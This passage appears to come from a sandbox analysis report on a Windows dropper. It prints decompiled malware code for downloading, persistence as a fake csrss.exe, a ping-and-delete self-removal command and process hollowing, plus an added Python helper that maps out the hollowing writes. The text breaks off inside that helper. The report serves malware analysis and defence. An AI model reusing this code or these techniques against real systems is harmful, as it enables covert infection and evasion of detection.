                                                                                                        0x00407d04
                                                                                                        0x00407d07
                                                                                                        0x00407d23
                                                                                                        0x00407d33
                                                                                                        0x00407d38
                                                                                                        0x00407d3b
                                                                                                        0x00407d44
                                                                                                        0x00407d50
                                                                                                        0x00407d57
                                                                                                        0x00407d5a
                                                                                                        0x00407d67
                                                                                                        0x00407d76
                                                                                                        0x00407d87
                                                                                                        0x00407d89
                                                                                                        0x00407d8e
                                                                                                        0x00407eb2
                                                                                                        0x00407eb5
                                                                                                        0x00407ec3
                                                                                                        0x00407ecd
                                                                                                        0x00407d94
                                                                                                        0x00407d9a
                                                                                                        0x00407d9f
                                                                                                        0x00407da4
                                                                                                        0x00407de7
                                                                                                        0x00407df8
                                                                                                        0x00000000
                                                                                                        0x00407dfe
                                                                                                        0x00407dfe
                                                                                                        0x00407e09
                                                                                                        0x00407e0b
                                                                                                        0x00407e10
                                                                                                        0x00407ea7
                                                                                                        0x00000000
                                                                                                        0x00407e16
                                                                                                        0x00407e16
                                                                                                        0x00407e2a
                                                                                                        0x00407e53
                                                                                                        0x00407e81
                                                                                                        0x00407e89
                                                                                                        0x00407e92
                                                                                                        0x00407e97
                                                                                                        0x00407e9c
                                                                                                        0x00407ea6
                                                                                                        0x00407e55
                                                                                                        0x00407e55
                                                                                                        0x00000000
                                                                                                        0x00407e55
                                                                                                        0x00407e2c
                                                                                                        0x00407e2c
                                                                                                        0x00407e31
                                                                                                        0x00407e66
                                                                                                        0x00407e6b
                                                                                                        0x00407e70
                                                                                                        0x00407e78
                                                                                                        0x00407e7f
                                                                                                        0x00407e33
                                                                                                        0x00407e33
                                                                                                        0x00000000
                                                                                                        0x00407e33
                                                                                                        0x00407e31
                                                                                                        0x00000000
                                                                                                        0x00407e35
                                                                                                        0x00407e3f
                                                                                                        0x00407e41
                                                                                                        0x00407e44
                                                                                                        0x00000000
                                                                                                        0x00407e48
                                                                                                        0x00407e10
                                                                                                        0x00407da6
                                                                                                        0x00407da9
                                                                                                        0x00407db0
                                                                                                        0x00407dc3
                                                                                                        0x00407eaa
                                                                                                        0x00407eb0
                                                                                                        0x00000000
                                                                                                        0x00407dc9
                                                                                                        0x00407dc9
                                                                                                        0x00407de1
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00407de1
                                                                                                        0x00407dc3
                                                                                                        0x00407da4
                                                                                                        0x00407d09
                                                                                                        0x00407d09
                                                                                                        0x00407d14
                                                                                                        0x00407d22
                                                                                                        0x00407d22
                                                                                                        0x00407cda
                                                                                                        0x00407cdb
                                                                                                        0x00407ceb
                                                                                                        0x00407ceb
                                                                                                        0x00407c96
                                                                                                        0x00407c96
                                                                                                        0x00407c96
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • InternetCrackUrlA.WININET(00000044,00000000,?), ref: 00407C87
                                                                                                        • InternetOpenA.WININET(WinInetGet/0.1,00000000,00000000,00000000,00000000), ref: 00407CCD
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.493674671.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Internet$CrackOpen
                                                                                                        • String ID: GET$WinInetGet/0.1$application/applefile$application/exe$application/gzip$application/zlib$https://$https://$text/*
                                                                                                        • API String ID: 1262293563-1634511642
                                                                                                        • Opcode ID: f6c8cf70005e460737aeb64da07ddfed1755531fa4350254e23b284514829349
                                                                                                        • Instruction ID: 4be7173def1fabf2422f7d93ddf0ca221e4e961e0538c85c9162d68e93896e62
                                                                                                        • Opcode Fuzzy Hash: f6c8cf70005e460737aeb64da07ddfed1755531fa4350254e23b284514829349
                                                                                                        • Instruction Fuzzy Hash: BD71E471E00209BBEB10AFA1ED45BAEBBB8EF44324F104176F904F62D1D7796D10CA99
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 82%
                                                                                                        			E004076A0(short __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12, intOrPtr _a16) {
                                                                                                        				char _v8;
                                                                                                        				struct _PROCESS_INFORMATION _v24;
                                                                                                        				struct _STARTUPINFOW _v92;
                                                                                                        				short _v1116;
                                                                                                        				char _v1636;
                                                                                                        				short _v4196;
                                                                                                        				void* _t53;
                                                                                                        				WCHAR* _t54;
                                                                                                        				WCHAR* _t56;
                                                                                                        				WCHAR* _t58;
                                                                                                        				WCHAR* _t59;
                                                                                                        				WCHAR* _t60;
                                                                                                        				signed int _t62;
                                                                                                        				WCHAR* _t66;
                                                                                                        				WCHAR* _t81;
                                                                                                        				WCHAR* _t82;
                                                                                                        				void* _t87;
                                                                                                        				void* _t88;
                                                                                                        				WCHAR* _t103;
                                                                                                        				WCHAR* _t107;
                                                                                                        				WCHAR* _t110;
                                                                                                        				int _t115;
                                                                                                        				signed int _t120;
                                                                                                        				WCHAR* _t121;
                                                                                                        				WCHAR* _t122;
                                                                                                        				void* _t140;
                                                                                                        				intOrPtr* _t141;
                                                                                                        				WCHAR* _t143;
                                                                                                        				void* _t146;
                                                                                                        				void* _t147;
                                                                                                        				void* _t148;
                                                                                                        				void* _t149;
                                                                                                        				void* _t151;
                                                                                                        				void* _t152;
                                                                                                        				void* _t153;
                                                                                                        				void* _t155;
                                                                                                        				void* _t156;
                                                                                                        
                                                                                                        				_t130 = __ecx;
                                                                                                        				_t148 = _t147 - 0x1060;
                                                                                                        				_t156 =  *0x5d2e00 - 0xc350; // 0x0
                                                                                                        				if(_t156 >= 0) {
                                                                                                        					L39:
                                                                                                        					__eflags = 0;
                                                                                                        					return 0;
                                                                                                        				} else {
                                                                                                        					_t157 =  *0x5d1c4c;
                                                                                                        					if( *0x5d1c4c == 0) {
                                                                                                        						goto L39;
                                                                                                        					} else {
                                                                                                        						E00401BB0( &_v92, 0, 0x44);
                                                                                                        						asm("xorps xmm0, xmm0");
                                                                                                        						asm("movups [ebp-0x14], xmm0");
                                                                                                        						_t53 = E00407C30(_t130, __edx, _t157, _a4,  &_v8);
                                                                                                        						_t135 = _t53;
                                                                                                        						_t149 = _t148 + 0x14;
                                                                                                        						if(_t53 != 0) {
                                                                                                        							_t141 = __imp__GetLongPathNameW;
                                                                                                        							_t54 =  *_t141("C:\Users\alfons\AppData\Local\Temp\4rC1bQcnl5.exe", "C:\Users\alfons\AppData\Local\Temp\4rC1bQcnl5.exe", 0x200, _t140);
                                                                                                        							__eflags = _t54;
                                                                                                        							if(_t54 == 0) {
                                                                                                        								L37:
                                                                                                        								_push(_v8);
                                                                                                        								goto L38;
                                                                                                        							} else {
                                                                                                        								__eflags = _t54 - 0x200;
                                                                                                        								if(_t54 > 0x200) {
                                                                                                        									goto L37;
                                                                                                        								} else {
                                                                                                        									_t56 = E00401A30("C:\Users\alfons\AppData\Local\Temp\4rC1bQcnl5.exe", "C:\ProgramData\LKBNMTFJgl");
                                                                                                        									_t149 = _t149 + 8;
                                                                                                        									__eflags = _t56;
                                                                                                        									if(_t56 != 0) {
                                                                                                        										L10:
                                                                                                        										_t58 = GetTempPathW(0x200,  &_v1116);
                                                                                                        										__eflags = _t58;
                                                                                                        										if(_t58 == 0) {
                                                                                                        											goto L37;
                                                                                                        										} else {
                                                                                                        											__eflags = _t58 - 0x200;
                                                                                                        											if(_t58 > 0x200) {
                                                                                                        												goto L37;
                                                                                                        											} else {
                                                                                                        												_t59 =  &_v1116;
                                                                                                        												_t60 =  *_t141(_t59, _t59, 0x200);
                                                                                                        												__eflags = _t60;
                                                                                                        												if(_t60 == 0) {
                                                                                                        													goto L37;
                                                                                                        												} else {
                                                                                                        													__eflags = _t60 - 0x200;
                                                                                                        													if(_t60 > 0x200) {
                                                                                                        														goto L37;
                                                                                                        													} else {
                                                                                                        														_t62 = E00401B40( &_v1116);
                                                                                                        														_t151 = _t149 + 4;
                                                                                                        														__eflags =  *((short*)(_t146 + _t62 * 2 - 0x45a)) - 0x5c;
                                                                                                        														if( *((short*)(_t146 + _t62 * 2 - 0x45a)) != 0x5c) {
                                                                                                        															 *((short*)(_t146 + E00401B40( &_v1116) * 2 - 0x458)) = 0x5c;
                                                                                                        															_t120 = E00401B40( &_v1116);
                                                                                                        															_t151 = _t151 + 8;
                                                                                                        															_t130 = 0;
                                                                                                        															__eflags = 0;
                                                                                                        															 *((short*)(_t146 + _t120 * 2 - 0x456)) = 0;
                                                                                                        														}
                                                                                                        														E00401970( &_v1116, "csrss.exe");
                                                                                                        														_t152 = _t151 + 8;
                                                                                                        														goto L17;
                                                                                                        													}
                                                                                                        												}
                                                                                                        											}
                                                                                                        										}
                                                                                                        									} else {
                                                                                                        										_t121 = E00401A30("C:\Users\alfons\AppData\Local\Temp\4rC1bQcnl5.exe", L"ProgramData");
                                                                                                        										_t149 = _t149 + 8;
                                                                                                        										__eflags = _t121;
                                                                                                        										if(_t121 != 0) {
                                                                                                        											goto L10;
                                                                                                        										} else {
                                                                                                        											_t122 = E00401A30("C:\Users\alfons\AppData\Local\Temp\4rC1bQcnl5.exe", "LKBNMTFJgl");
                                                                                                        											_t149 = _t149 + 8;
                                                                                                        											__eflags = _t122;
                                                                                                        											if(_t122 != 0) {
                                                                                                        												goto L10;
                                                                                                        											} else {
                                                                                                        												E00401A00( &_v1116, "C:\ProgramData\LKBNMTFJgl");
                                                                                                        												E00401970( &_v1116, "\\");
                                                                                                        												E00401970( &_v1116, "csrss.exe");
                                                                                                        												_t152 = _t149 + 0x18;
                                                                                                        												E00406D50();
                                                                                                        												L17:
                                                                                                        												_t66 = E004087C0( &_v1116, _v8, _t135);
                                                                                                        												_t149 = _t152 + 0xc;
                                                                                                        												_push(_v8);
                                                                                                        												__eflags = _t66;
                                                                                                        												if(_t66 == 0) {
                                                                                                        													L38:
                                                                                                        													E00401510();
                                                                                                        													 *0x5d2e00 =  &(( *0x5d2e00)[0]);
                                                                                                        													__eflags =  *0x5d2e00;
                                                                                                        													goto L39;
                                                                                                        												} else {
                                                                                                        													E00401510();
                                                                                                        													_t143 = E004015E0(0x24);
                                                                                                        													_t153 = _t149 + 8;
                                                                                                        													__eflags = _t143;
                                                                                                        													if(_t143 != 0) {
                                                                                                        														_t81 = E00408B20( &_v1116, _t143);
                                                                                                        														_t155 = _t153 + 8;
                                                                                                        														__eflags = _t81;
                                                                                                        														if(_t81 != 0) {
                                                                                                        															_t143[0x10] = 0;
                                                                                                        															_t82 = E00401740(_t143, _a16);
                                                                                                        															_t155 = _t155 + 8;
                                                                                                        															_push(_t143);
                                                                                                        															__eflags = _t82;
                                                                                                        															if(_t82 != 0) {
                                                                                                        																goto L21;
                                                                                                        															} else {
                                                                                                        																E00401510();
                                                                                                        																_t153 = _t155 + 4;
                                                                                                        																__eflags =  *0x5d1300;
                                                                                                        																if( *0x5d1300 == 0) {
                                                                                                        																	L29:
                                                                                                        																	__eflags = _a12;
                                                                                                        																	if(_a12 != 0) {
                                                                                                        																		E00408730(_a8);
                                                                                                        																		_t153 = _t153 + 4;
                                                                                                        																	}
                                                                                                        																	 *0x5d2118 = 1;
                                                                                                        																	_t87 =  *0x5d211c; // 0x1f8
                                                                                                        																	__eflags = _t87;
                                                                                                        																	if(_t87 == 0) {
                                                                                                        																		L33:
                                                                                                        																		_t88 =  *0x5d2120; // 0x0
                                                                                                        																		__eflags = _t88;
                                                                                                        																		if(_t88 != 0) {
                                                                                                        																			TerminateThread(_t88, 0);
                                                                                                        																		}
                                                                                                        																		E00401A00( &_v4196, L"cmd.exe /C ping 1.1.1.1 -n 8 -w 3000 > Nul & Del /f /q \"");
                                                                                                        																		E00401970( &_v4196, "C:\Users\alfons\AppData\Local\Temp\4rC1bQcnl5.exe");
                                                                                                        																		E00401970( &_v4196, L"\" & \"");
                                                                                                        																		E00401970( &_v4196,  &_v1116);
                                                                                                        																		E00401970( &_v4196, "\"");
                                                                                                        																		_t153 = _t153 + 0x28;
                                                                                                        																		_t103 = CreateProcessW(0,  &_v4196, 0, 0, 0, 0x8000000, 0, 0,  &_v92,  &_v24);
                                                                                                        																		__eflags = _t103;
                                                                                                        																		if(_t103 != 0) {
                                                                                                        																			CloseHandle(_v24.hThread);
                                                                                                        																			CloseHandle(_v24);
                                                                                                        																			ExitProcess(0);
                                                                                                        																		}
                                                                                                        																	} else {
                                                                                                        																		_t107 = WaitForSingleObject(_t87, 0xea60);
                                                                                                        																		__eflags = _t107;
                                                                                                        																		if(_t107 == 0) {
                                                                                                        																			goto L33;
                                                                                                        																		}
                                                                                                        																	}
                                                                                                        																} else {
                                                                                                        																	_t143 = E004015E0(0x400);
                                                                                                        																	_t153 = _t153 + 4;
                                                                                                        																	__eflags = _t143;
                                                                                                        																	if(_t143 != 0) {
                                                                                                        																		_t110 = E00407FA0(_t130, _t143, 0x40aad0, 7);
                                                                                                        																		_t155 = _t153 + 0xc;
                                                                                                        																		__eflags = _t110;
                                                                                                        																		if(_t110 == 0) {
                                                                                                        																			goto L20;
                                                                                                        																		} else {
                                                                                                        																			E00401970(_t143, "\\");
                                                                                                        																			E00401970(_t143, "viTRMUuKeV");
                                                                                                        																			E00401970(_t143, L".url");
                                                                                                        																			_t155 = _t155 + 0x18;
                                                                                                        																			E00406D70();
                                                                                                        																			_t115 = DeleteFileW(_t143);
                                                                                                        																			_push(_t143);
                                                                                                        																			__eflags = _t115;
                                                                                                        																			if(_t115 == 0) {
                                                                                                        																				goto L21;
                                                                                                        																			} else {
                                                                                                        																				E00401510();
                                                                                                        																				_t153 = _t155 + 4;
                                                                                                        																				goto L29;
                                                                                                        																			}
                                                                                                        																		}
                                                                                                        																	}
                                                                                                        																}
                                                                                                        															}
                                                                                                        														} else {
                                                                                                        															L20:
                                                                                                        															_push(_t143);
                                                                                                        															L21:
                                                                                                        															E00401510();
                                                                                                        															_t153 = _t155 + 4;
                                                                                                        														}
                                                                                                        													}
                                                                                                        													DeleteFileW( &_v1116);
                                                                                                        													 *0x5d2e00 =  &(( *0x5d2e00)[0]);
                                                                                                        													E00401A00( &_v1636, "C:\ProgramData\LKBNMTFJgl");
                                                                                                        													E00401970( &_v1636, "\\");
                                                                                                        													E00401970( &_v1636, "csrss.exe");
                                                                                                        													E00406340( &_v1636);
                                                                                                        													__eflags = 0;
                                                                                                        													return 0;
                                                                                                        												}
                                                                                                        											}
                                                                                                        										}
                                                                                                        									}
                                                                                                        								}
                                                                                                        							}
                                                                                                        						} else {
                                                                                                        							 *0x5d2e00 =  &(( *0x5d2e00)[0]);
                                                                                                        							return _t53;
                                                                                                        						}
                                                                                                        					}
                                                                                                        				}
                                                                                                        			}

                                                                                                        APIs
                                                                                                          • Part of subcall function 00407C30: InternetCrackUrlA.WININET(00000044,00000000,?), ref: 00407C87
                                                                                                        • GetLongPathNameW.KERNEL32(C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe,C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe,00000200), ref: 00407715
                                                                                                        • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004078B0
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.493674671.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CrackDeleteFileInternetLongNamePath
                                                                                                        • String ID: " & "$.url$C:\ProgramData\LKBNMTFJgl$C:\Users\user\AppData\Local\Temp\4rC1bQcnl5.exe$LKBNMTFJgl$ProgramData$cmd.exe /C ping 1.1.1.1 -n 8 -w 3000 > Nul & Del /f /q "$csrss.exe$viTRMUuKeV$zJ@
                                                                                                        • API String ID: 3724707802-4215802547
                                                                                                        • Opcode ID: 6894e1fd763ebf7c80e388c5e2625915a5104925a43bcd60d952a30ebe1ee402
                                                                                                        • Instruction ID: 401daa4757a0587c7b000174fcf8883a011eebc5c06fd5704f7b7c2f209f5124
                                                                                                        • Opcode Fuzzy Hash: 6894e1fd763ebf7c80e388c5e2625915a5104925a43bcd60d952a30ebe1ee402
                                                                                                        • Instruction Fuzzy Hash: 1C91B9B1E4420876DB20B7A59C06FDB376CAF00745F04007BF904B21D2EA7CBA54CAAE
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 84%
                                                                                                        			E00405B80(void* __ebx, void* __ecx, void* __eflags, WCHAR* _a4) {
                                                                                                        				intOrPtr _v12;
                                                                                                        				void* _v16;
                                                                                                        				void* _v20;
                                                                                                        				void* _v24;
                                                                                                        				void _v28;
                                                                                                        				long _v32;
                                                                                                        				char _v36;
                                                                                                        				intOrPtr _v40;
                                                                                                        				void* _v44;
                                                                                                        				char _v112;
                                                                                                        				struct _CONTEXT _v828;
                                                                                                        				intOrPtr _t62;
                                                                                                        				void* _t70;
                                                                                                        				void* _t72;
                                                                                                        				void* _t81;
                                                                                                        				void* _t82;
                                                                                                        				void* _t84;
                                                                                                        				signed int _t85;
                                                                                                        				void* _t90;
                                                                                                        				void* _t94;
                                                                                                        				void* _t95;
                                                                                                        				void* _t108;
                                                                                                        				void* _t115;
                                                                                                        				void* _t117;
                                                                                                        				void _t120;
                                                                                                        				intOrPtr _t123;
                                                                                                        				void* _t126;
                                                                                                        				void* _t132;
                                                                                                        				void* _t133;
                                                                                                        				intOrPtr* _t136;
                                                                                                        				void* _t137;
                                                                                                        				void* _t138;
                                                                                                        				void* _t142;
                                                                                                        				void* _t143;
                                                                                                        
                                                                                                        				_t115 = __ebx;
                                                                                                        				E00401BB0( &(_v828.Dr0), 0, 0x2c8);
                                                                                                        				_v28 = 0;
                                                                                                        				_t138 = _t137 + 0xc;
                                                                                                        				_v32 = 0;
                                                                                                        				_v828.ContextFlags = 0x10007;
                                                                                                        				_t142 =  *0x40c038 - 0x5a4d; // 0x6b7d
                                                                                                        				if(_t142 == 0) {
                                                                                                        					L3:
                                                                                                        					_t62 =  *0x40c074; // 0x383538b7
                                                                                                        					__eflags =  *((intOrPtr*)(_t62 + 0x40c038)) - 0x4550;
                                                                                                        					_t6 = _t62 + 0x40c038; // 0x3875f8ef
                                                                                                        					_t126 = _t6;
                                                                                                        					if( *((intOrPtr*)(_t62 + 0x40c038)) != 0x4550) {
                                                                                                        						L27:
                                                                                                        						__eflags = 0;
                                                                                                        						return 0;
                                                                                                        					} else {
                                                                                                        						E00401670( &_v112, 0, 0x44);
                                                                                                        						E00401670( &_v20, 0, 0x10);
                                                                                                        						_v112 = 0x44;
                                                                                                        						__eflags =  *0x5d1bb8;
                                                                                                        						_push( &_v20);
                                                                                                        						_push( &_v112);
                                                                                                        						_push(0);
                                                                                                        						_push(0);
                                                                                                        						if( *0x5d1bb8 == 0) {
                                                                                                        							_push(0x14);
                                                                                                        						} else {
                                                                                                        							_push(0x800000c);
                                                                                                        						}
                                                                                                        						_t70 = CreateProcessW(0, _a4, 0, 0, 0, ??, ??, ??, ??, ??);
                                                                                                        						__eflags = _t70;
                                                                                                        						if(_t70 == 0) {
                                                                                                        							goto L27;
                                                                                                        						} else {
                                                                                                        							_push(_t115);
                                                                                                        							_t14 =  &_v16; // 0x4049e6
                                                                                                        							_t72 = GetThreadContext( *_t14,  &_v828);
                                                                                                        							__eflags = _t72;
                                                                                                        							if(_t72 == 0) {
                                                                                                        								L26:
                                                                                                        								TerminateProcess(_v20, 0);
                                                                                                        								CloseHandle(_v16);
                                                                                                        								CloseHandle(_v20);
                                                                                                        								__eflags = 0;
                                                                                                        								return 0;
                                                                                                        							} else {
                                                                                                        								_t81 = ReadProcessMemory(_v20, _v828.Ebx + 8,  &_v28, 4,  &_v32);
                                                                                                        								__eflags = _t81;
                                                                                                        								if(_t81 == 0) {
                                                                                                        									goto L26;
                                                                                                        								} else {
                                                                                                        									_t123 =  *((intOrPtr*)(_t126 + 0x34));
                                                                                                        									_t120 = _v28;
                                                                                                        									__eflags = _t120 - _t123;
                                                                                                        									if(__eflags < 0) {
                                                                                                        										L13:
                                                                                                        										_t82 = E004072C0(__eflags, _v20,  *((intOrPtr*)(_t126 + 0x34)), 0,  *((intOrPtr*)(_t126 + 0x50)), 0x3000, 0x40);
                                                                                                        										_t132 = _t82;
                                                                                                        										_v24 = _t132;
                                                                                                        										__eflags = _t132;
                                                                                                        										if(_t132 == 0) {
                                                                                                        											goto L26;
                                                                                                        										} else {
                                                                                                        											asm("cdq");
                                                                                                        											_t124 =  &_v36;
                                                                                                        											_v44 = _t82;
                                                                                                        											_v40 = _t123;
                                                                                                        											_t84 = E004074D0(_t82,  &_v36, _v20, _t82, _t123, 0x40c038,  *((intOrPtr*)(_t126 + 0x54)),  &_v36);
                                                                                                        											__eflags = _t84;
                                                                                                        											if(_t84 == 0) {
                                                                                                        												goto L26;
                                                                                                        											} else {
                                                                                                        												_t85 =  *(_t126 + 0x14) & 0x0000ffff;
                                                                                                        												_t117 = 0;
                                                                                                        												__eflags = 0 -  *(_t126 + 6);
                                                                                                        												if(0 >=  *(_t126 + 6)) {
                                                                                                        													L20:
                                                                                                        													_t42 = _t126 + 0x34; // 0x3875f923
                                                                                                        													_t90 = E004074D0(0, _t124, _v20, _v828.Ebx + 8, 0, _t42, 4,  &_v36);
                                                                                                        													__eflags = _t90;
                                                                                                        													if(_t90 == 0) {
                                                                                                        														goto L26;
                                                                                                        													} else {
                                                                                                        														_v828.Eax =  *((intOrPtr*)(_t126 + 0x28)) + _t132;
                                                                                                        														_t94 = SetThreadContext(_v16,  &_v828);
                                                                                                        														__eflags = _t94;
                                                                                                        														if(_t94 == 0) {
                                                                                                        															goto L26;
                                                                                                        														} else {
                                                                                                        															_t95 = E004071A0(0, _t124, _v16);
                                                                                                        															__eflags = _t95;
                                                                                                        															if(_t95 == 0) {
                                                                                                        																goto L26;
                                                                                                        															} else {
                                                                                                        																Sleep(0x1388);
                                                                                                        																_t133 = VirtualAlloc(0, 0x138, 0x3000, 4);
                                                                                                        																__eflags = _t133;
                                                                                                        																if(_t133 != 0) {
                                                                                                        																	E00401BB0(_t133, 0, 0x138);
                                                                                                        																	E004074D0(0, _t124, _v20, _v44, _v40, _t133, 0x138,  &_v24);
                                                                                                        																	VirtualFree(_t133, 0, 0x8000);
                                                                                                        																}
                                                                                                        																CloseHandle(_v16);
                                                                                                        																CloseHandle(_v20);
                                                                                                        																return _v12;
                                                                                                        															}
                                                                                                        														}
                                                                                                        													}
                                                                                                        												} else {
                                                                                                        													_t34 = _t126 + 0x2c; // 0x3875f91b
                                                                                                        													_t136 = _t34 + _t85;
                                                                                                        													asm("o16 nop [eax+eax]");
                                                                                                        													while(1) {
                                                                                                        														_t108 = E004074D0(0, _t124, _v20,  *((intOrPtr*)(_t136 - 8)) + _v24, 0,  *_t136 + 0x40c038,  *((intOrPtr*)(_t136 - 4)), 0);
                                                                                                        														__eflags = _t108;
                                                                                                        														if(_t108 == 0) {
                                                                                                        															goto L26;
                                                                                                        														}
                                                                                                        														_t117 = _t117 + 1;
                                                                                                        														_t136 = _t136 + 0x28;
                                                                                                        														__eflags = _t117 - ( *(_t126 + 6) & 0x0000ffff);
                                                                                                        														if(_t117 < ( *(_t126 + 6) & 0x0000ffff)) {
                                                                                                        															continue;
                                                                                                        														} else {
                                                                                                        															_t132 = _v24;
                                                                                                        															goto L20;
                                                                                                        														}
                                                                                                        														goto L28;
                                                                                                        													}
                                                                                                        													goto L26;
                                                                                                        												}
                                                                                                        											}
                                                                                                        										}
                                                                                                        									} else {
                                                                                                        										__eflags = _t120 -  *((intOrPtr*)(_t126 + 0x50)) + _t123;
                                                                                                        										if(__eflags > 0) {
                                                                                                        											goto L13;
                                                                                                        										} else {
                                                                                                        											__eflags = E00407120(_t123, _v20, _t120, 0);
                                                                                                        											if(__eflags != 0) {
                                                                                                        												goto L26;
                                                                                                        											} else {
                                                                                                        												goto L13;
                                                                                                        											}
                                                                                                        										}
                                                                                                        									}
                                                                                                        								}
                                                                                                        							}
                                                                                                        						}
                                                                                                        					}
                                                                                                        				} else {
                                                                                                        					E00401CE0("0125789244697858", 0x10, 0x40c038, 0xe7c00);
                                                                                                        					_t138 = _t138 + 0x10;
                                                                                                        					_t143 =  *0x40c038 - 0x5a4d; // 0x6b7d
                                                                                                        					if(_t143 == 0) {
                                                                                                        						goto L3;
                                                                                                        					} else {
                                                                                                        						return 0;
                                                                                                        					}
                                                                                                        				}
                                                                                                        				L28:
                                                                                                        			}
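The routine above is the report's decompilation of the dropper's process-hollowing step. It decrypts the blob at 0x40c038 in place with the 16-byte key string (E00401CE0; the cipher is not shown on this page), checks the MZ and PE signatures, starts the program named by _a4 suspended (dwCreationFlags 0x14 or 0x800000c), reads the child's current image base at Ebx+8 of the suspended thread's context (Ebx holds the PEB pointer there), unmaps the original image when it overlaps the payload's preferred ImageBase, allocates SizeOfImage bytes at ImageBase with 0x3000/0x40 (commit, RWX), copies SizeOfHeaders bytes and then each section by PointerToRawData, VirtualAddress and SizeOfRawData, writes ImageBase back to PEB+8, sets Eax to the entry point, resumes the thread, sleeps 5 s and finally writes 0x138 zero bytes over the start of the remote image. The Python below is an added example for this report, not code from the sample or from Joe Sandbox: it reads the same header fields at the same offsets and returns the write plan the loader would execute, together with the unmap check and the creation-flag decode. Assumptions: E004072C0, E004074D0, E00407120 and E004071A0 are treated as allocate, write, unmap and resume wrappers only because of their arguments and position in the flow (the report does not name them); the overlap test follows the natural reading of a comparison whose printed operator precedence is ambiguous; and the PE image is a constructed minimal stub, not the decrypted payload.

```python
"""
Walk a PE image the way E00405B80 (above) does before hollowing a child.
Added example for this report, not code from the sample or from Joe
Sandbox; the demo PE is constructed, not the decrypted blob at 0x40c038.
"""
import struct

IMAGE_DOS_SIGNATURE = 0x5A4D   # 'MZ', compared against *0x40c038
IMAGE_NT_SIGNATURE = 0x4550    # 'PE\0\0', compared at 0x40c038 + e_lfanew
SECTION_HEADER_SIZE = 0x28     # stride of the section-copy loop
HEADER_WIPE_SIZE = 0x138       # zeroed buffer written back after the Sleep
RESUME_DELAY_MS = 0x1388       # Sleep(0x1388) == 5000 ms

# dwCreationFlags words the loader pushes (0x14 or 0x800000c); Windows constants.
CREATION_FLAG_NAMES = {
    0x00000004: "CREATE_SUSPENDED",
    0x00000008: "DETACHED_PROCESS",
    0x00000010: "CREATE_NEW_CONSOLE",
    0x08000000: "CREATE_NO_WINDOW",
}


def decode_creation_flags(value):
    """Name the set bits of a dwCreationFlags value, lowest bit first."""
    return [name for bit, name in sorted(CREATION_FLAG_NAMES.items()) if value & bit]


def u16(buf, off): return struct.unpack_from("<H", buf, off)[0]
def u32(buf, off): return struct.unpack_from("<I", buf, off)[0]


def needs_unmap(remote_image_base, image_base, size_of_image):
    """Range check done before the allocation: the child's original image is
    unmapped only if its base lies in [ImageBase, ImageBase + SizeOfImage].
    (Our reading; the printed comparison has ambiguous operator precedence.)"""
    return image_base <= remote_image_base <= image_base + size_of_image


def hollow_plan(image):
    """Return the loader's cross-process write plan, or None where it bails."""
    if len(image) < 0x40 or u16(image, 0) != IMAGE_DOS_SIGNATURE:
        return None
    nt = u32(image, 0x3C)                      # e_lfanew
    if nt + 0x58 > len(image) or u32(image, nt) != IMAGE_NT_SIGNATURE:
        return None
    num_sections = u16(image, nt + 0x06)
    opt_size = u16(image, nt + 0x14)           # SizeOfOptionalHeader
    entry_rva = u32(image, nt + 0x28)          # AddressOfEntryPoint
    image_base = u32(image, nt + 0x34)
    size_of_image = u32(image, nt + 0x50)
    size_of_headers = u32(image, nt + 0x54)

    sections = []
    table = nt + 0x18 + opt_size               # first IMAGE_SECTION_HEADER
    for i in range(num_sections):
        hdr = table + i * SECTION_HEADER_SIZE
        if hdr + SECTION_HEADER_SIZE > len(image):
            return None                        # truncated table: give up
        name = image[hdr:hdr + 8].split(b"\0", 1)[0].decode("ascii", "replace")
        sections.append({
            "name": name,
            "dst": image_base + u32(image, hdr + 0x0C),   # VirtualAddress
            "src": u32(image, hdr + 0x14),                # PointerToRawData
            "size": u32(image, hdr + 0x10),               # SizeOfRawData
        })

    return {
        "image_base": image_base,
        "size_of_image": size_of_image,
        # E004072C0(hProcess, ImageBase, 0, SizeOfImage, 0x3000, 0x40): by its
        # arguments a VirtualAllocEx-style reservation, commit + RWX (assumed)
        "alloc": {"addr": image_base, "size": size_of_image, "protect": 0x40},
        "headers": {"dst": image_base, "src": 0, "size": size_of_headers},
        "sections": sections,
        "peb_image_base_patch": image_base,     # 4-byte write at PEB+8
        "entry_point": image_base + entry_rva,  # becomes CONTEXT.Eax
        "post_resume_header_wipe": {
            "dst": image_base, "size": HEADER_WIPE_SIZE, "delay_ms": RESUME_DELAY_MS},
    }


def build_demo_image():
    """Constructed minimal PE32 with one .text section (demo data only)."""
    nt, opt_size, raw_ptr, raw_size = 0x80, 0xE0, 0x200, 0x200
    sec = nt + 0x18 + opt_size
    img = bytearray(raw_ptr + raw_size)
    for fmt, off, val in (
        ("<H", 0x00, IMAGE_DOS_SIGNATURE), ("<I", 0x3C, nt),
        ("<I", nt, IMAGE_NT_SIGNATURE), ("<H", nt + 0x04, 0x14C),   # i386
        ("<H", nt + 0x06, 1), ("<H", nt + 0x14, opt_size), ("<H", nt + 0x18, 0x10B),
        ("<I", nt + 0x28, 0x1000), ("<I", nt + 0x34, 0x00400000),  # AEP, ImageBase
        ("<I", nt + 0x50, 0x2000), ("<I", nt + 0x54, raw_ptr),     # SizeOfImage/Headers
        ("<I", sec + 0x08, raw_size), ("<I", sec + 0x0C, 0x1000),  # VirtualSize/VA
        ("<I", sec + 0x10, raw_size), ("<I", sec + 0x14, raw_ptr), # SizeOfRawData/ptr
    ):
        struct.pack_into(fmt, img, off, val)
    img[sec:sec + 5] = b".text"
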